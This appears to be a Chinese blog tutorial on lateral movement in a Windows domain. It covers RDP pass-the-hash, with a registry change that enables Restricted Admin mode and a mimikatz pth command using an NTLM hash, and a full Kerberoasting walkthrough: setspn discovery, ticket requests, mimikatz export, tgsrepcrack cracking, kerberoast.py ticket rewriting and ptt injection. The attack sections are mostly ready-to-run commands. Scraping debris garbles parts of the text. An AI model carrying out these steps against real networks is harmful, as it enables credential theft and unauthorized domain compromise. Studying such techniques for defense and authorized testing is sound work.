基础26-域横向之RDP及SPN服务

mxsillusion

​基础26-域横向之RDP及SPN服务原创 M9 [url=]小白渗透成长之路[/url] 2022-02-14 08:30
收录于话题
#渗透基础33个
#域渗透6个

微信公众号：[小白渗透成长之路]
[如果你觉得文章对你有帮助，欢迎点赞][????????]

内容目录案例1-横向移动RDP传递-Mimikatz案例2：横向移动SPN服务-探针，请求，导出，破解，重写
案例1-横向移动RDP传递-Mimikatz除了之前说到的IPC，WMI，SMB等协议的链接外，获取的明文密码或HASH密文也可以通过RDP协议进行链接操作。
RDP协议连接：3389端口-远程连接
RDP明文密码链接

       
• 
         
• 
  

windows：mstscmstsc.exe /console /v:192.168.0.21 /admin正在上传…重新上传取消
就是我们这种最常用的连接方式

       
• 
         
• 
  

Linux:rdesktop 192.168.41.141:3389​
RDP密文hash连接
windows server需要开启 Restricted Admin mode，在windows 8.1和windows server 2012 R2中默认开启，同时如果win7和windows server 2008R2安装了2871997、2973351补丁也支持；开启命令：

       
• 
  

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
在打了补丁之后就是关闭状态，但是我们可以操作注册表打开，需要管理员权限。

       
• 
         
• 
         
• 
         
• 
         
• 
  

开启后使用mimikatz运行即可：1.mstsc.exe /restrictedadmin2.mimikatz.exe3.privilege::debug4.sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"案例2：横向移动SPN服务原理过程：

       
• 
         
• 
         
• 
         
• 
         
• 
         
• 
         
• 
         
• 
         
• 
         
• 
         
• 
  

黑客可以使用有效的域用户的身份验证票证（TGT）去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN，并使用与SPN关联的服务帐户加密票证，以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5，这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解，即可得到目标服务帐号的HASH，这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN，那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键第一步：探针

       
• 
         
• 
  

setspn -q /setspn -q / | findstr "Mssql"​

发现MSSQL服务
第二步：请求

       
• 
  

Add-Type -AssemblyName System.IdentityModel
​

       
• 
         
• 
  

New-Objectsystem.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList "XXXXXX"​

然后查看本地票据

​

发现多了一条刚才的请求。

       
• 
  

mimikatz.exe "kerberos::ask /target:XXXX"
第三步：导出

       
• 
  

mimikatz.exe "Kerberos::ask /target:"XXXX"
使用mimikatz导出当前电脑保存的凭证
​
​
​

第四步：破解
使用工具：kerberoast

       
• 
  

python tgsrepcrack.py password.txt XXXXX.kirbi
正在上传…重新上传取消

​

成功破解出密码为Admin123，能否成功看pass字典。

扩展：当然也可以可以进行重写

       
• 
         
• 
  

python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500     #-u 用户编号admin用户编号

       
• 
         
• 
  

python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512     #-g 用户组admin组然后再使用mimikatz导入到内存中去

       
• 
         
• 
  

mimikatz.exe kerberos::ptt xxxx.kirbi      #将生成票据注入内存有连接票据的话就不再需要账号密码验证即可直接连接。
略微鸡肋。
总结：SPN可以扫描域内的一些常见服务，尝试破解。

​

小白渗透成长之路
一个非科班的信安小白，会将自己平时遇到的好的经验分享出来，共勉。同时也会转推一些大佬文章，小白成长之路，大佬勿喷呀。
68篇原创内容
公众号
喜欢此内容的人还喜欢
浅谈InnoDB中的聚簇索引和二级索引
第二范式
不喜欢
不看的原因
确定

       
• 内容质量低
         
• 
         
• 不看此公众号
  

Pandas | 设置数据索引
大气化学python笔记
不喜欢
不看的原因
确定

       
• 内容质量低
         
• 
         
• 不看此公众号
  

数据库索引
高压锅码农777
不喜欢
不看的原因
确定

       
• 内容质量低
         
• 
         
• 不看此公众号
  

转存失败重新上传取消
微信扫一扫
关注该公众号
​